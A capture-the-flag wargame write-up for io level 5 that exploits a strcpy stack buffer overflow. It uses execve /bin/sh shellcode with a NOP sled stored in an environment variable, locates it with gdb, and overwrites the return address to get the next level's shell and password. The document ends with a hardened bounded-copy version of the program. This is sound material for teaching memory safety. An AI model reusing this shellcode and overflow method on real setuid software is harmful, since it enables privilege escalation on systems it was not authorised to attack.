The source for Level 5 is as follows.
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv) {
    char buf[128];                 /* fixed-size stack buffer */
    if(argc < 2) return 1;
    strcpy(buf, argv[1]);          /* no length check: argv[1] longer than 127 bytes overruns buf */
    printf("%s\n", buf);
    return 0;
}
The problem is simple. argv[1] is copied into buf with strcpy(), and nothing limits the copy, so supplying more bytes than buf can hold overflows it.
So we place NOP + SHELLCODE in an environment variable, check its address with gdb, and then carry out the attack.
level5@io:/levels$ ./level05 `python -c "print 'A'*140"`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault
level5@io:/levels$ export SHELLCODE=`python -c "print '\x90'*100 + '\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80'"`
level5@io:/levels$ gdb level05
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) b main
Breakpoint 1 at 0x80483bd
(gdb) r
Starting program: /levels/level05
Breakpoint 1, 0x080483bd in main ()
(gdb) x/32wx $esp
0xbfffdc10: 0x00000000 0x00000000 0xbfffdcb0 0xbfffdca4
0xbfffdc20: 0x00000000 0x00000000 0x00000000 0xbfffdcf0
0xbfffdc30: 0x00855668 0x0804820b 0x00000000 0x00000000
0xbfffdc40: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffdc50: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffdc60: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffdc70: 0x00000000 0x00000000 0xbfffde24 0x08048320
0xbfffdc80: 0x003bdff4 0x0804960c 0xbfffdc98 0x08048291
(gdb)
0xbfffdc90: 0x003bdff4 0xbfffdd4c 0xbfffdcb8 0x08048489
0xbfffdca0: 0x00848250 0x080482f0 0x00000000 0x003bdff4
0xbfffdcb0: 0x08048470 0x080482f0 0xbfffdd18 0x0029a455
0xbfffdcc0: 0x00000001 0xbfffdd44 0xbfffdd4c 0x00f8ab18
0xbfffdcd0: 0x00000001 0x00000001 0x00000000 0x0804820b
0xbfffdce0: 0x003bdff4 0x08048470 0x080482f0 0xbfffdd18
0xbfffdcf0: 0xebb98081 0x474835fe 0x00000000 0x00000000
0xbfffdd00: 0x00000000 0x0084d2e0 0x0029a37d 0x00854ff4
(gdb)
0xbfffdd10: 0x00000001 0x080482f0 0x00000000 0x08048311
0xbfffdd20: 0x080483b4 0x00000001 0xbfffdd44 0x08048470
0xbfffdd30: 0x08048420 0x00848250 0xbfffdd3c 0x00852ae5
0xbfffdd40: 0x00000001 0xbfffde24 0x00000000 0xbfffde34
0xbfffdd50: 0xbfffdec1 0xbfffded1 0xbfffdedc 0xbfffdefe
0xbfffdd60: 0xbfffdf11 0xbfffdf1d 0xbfffdf29 0xbfffdf56
0xbfffdd70: 0xbfffdf6c 0xbfffdf7b 0xbfffdf87 0xbfffdf90
0xbfffdd80: 0xbfffdfa2 0xbfffdfaa 0xbfffdfb9 0x00000000
(gdb)
0xbfffdd90: 0x00000010 0xbfebfbff 0x00000006 0x00001000
0xbfffdda0: 0x00000011 0x00000064 0x00000003 0x08048034
0xbfffddb0: 0x00000004 0x00000020 0x00000005 0x00000007
0xbfffddc0: 0x00000007 0x0083a000 0x00000008 0x00000000
0xbfffddd0: 0x00000009 0x080482f0 0x0000000b 0x000003ed
0xbfffdde0: 0x0000000c 0x000003ed 0x0000000d 0x000003ed
0xbfffddf0: 0x0000000e 0x000003ed 0x00000017 0x00000000
0xbfffde00: 0x0000000f 0xbfffde1b 0x00000000 0x00000000
(gdb)
0xbfffde10: 0x00000000 0x00000000 0x69000000 0x00363836
0xbfffde20: 0x00000000 0x76656c2f 0x2f736c65 0x6576656c
0xbfffde30: 0x0035306c 0x4c454853 0x444f434c 0x90903d45
0xbfffde40: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde50: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde60: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde70: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde80: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb)
0xbfffde90: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffdea0: 0x176a9090 0xcddb3158 0x580b6a80 0x2f685299
0xbfffdeb0: 0x6868732f 0x6e69622f 0x5352e389 0x80cde189
0xbfffdec0: 0x45485300 0x2f3d4c4c 0x2f6e6962 0x68736162
0xbfffded0: 0x52455400 0x696c3d4d 0x0078756e 0x5f485353
0xbfffdee0: 0x45494c43 0x323d544e 0x322e3131 0x312e3831
0xbfffdef0: 0x39392e36 0x39333220 0x32203034 0x53530032
0xbfffdf00: 0x54545f48 0x642f3d59 0x702f7665 0x322f7374
(gdb)
0xbfffdf10: 0x45535500 0x656c3d52 0x356c6576 0x4c4f4300
0xbfffdf20: 0x534e4d55 0x3134313d 0x54415000 0x752f3d48
0xbfffdf30: 0x6c2f7273 0x6c61636f 0x6e69622f 0x73752f3a
0xbfffdf40: 0x69622f72 0x622f3a6e 0x2f3a6e69 0x2f727375
0xbfffdf50: 0x656d6167 0x414d0073 0x2f3d4c49 0x2f726176
0xbfffdf60: 0x6c69616d 0x76656c2f 0x00356c65 0x752f3d5f
0xbfffdf70: 0x622f7273 0x672f6e69 0x50006264 0x2f3d4457
0xbfffdf80: 0x6576656c 0x4c00736c 0x53454e49 0x0038323d
(gdb) q
The program is running. Exit anyway? (y or n) y
level5@io:/levels$ ./level05 `python -c "print 'A'*140 + '\x60\xde\xff\xbf'"`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`??
sh-3.2$ id
uid=1005(level5) gid=1005(level5) euid=1006(level6) groups=1005(level5),1029(nosu)
sh-3.2$ cat /home/level06/.pass
cat: /home/level06/.pass: No such file or directory
sh-3.2$ cat /home/level6/.pass
mobjy2we
sh-3.2$
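For contrast, here is a hardened version of the level05 program. This is an added example, not the wargame's own code: the unchecked strcpy() is replaced by a bounded copy that refuses any argument that does not fit in buf (the names bounded_copy and level05_hardened are assumed).

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 128   /* same buffer size as the original level05 */

/* Copy src into dst[dst_size] only if it fits, terminator included.
 * Returns 0 on success, -1 if src is too long (dst is then left empty).
 * Hypothetical helper written for this example. */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    size_t len = 0;
    /* scan at most dst_size bytes, so an unterminated src cannot run us off */
    while (len < dst_size && src[len] != '\0')
        len++;
    if (len >= dst_size) {         /* no room for the NUL: reject instead of overflow */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);     /* copies the terminating NUL as well */
    return 0;
}

/* Same logic as level05's main(), with the copy bounds-checked.
 * Returns 0 on success, 1 if no argument, 2 if the argument is too long. */
int level05_hardened(int argc, char **argv)
{
    char buf[BUF_SIZE];
    if (argc < 2) return 1;
    if (bounded_copy(buf, sizeof buf, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return 2;
    }
    printf("%s\n", buf);
    return 0;
}

int main(int argc, char **argv)
{
    return level05_hardened(argc, argv);
}
```

With this check, the 140-byte 'A' payload from the session above is rejected before anything is written past buf, so the saved return address is never reached.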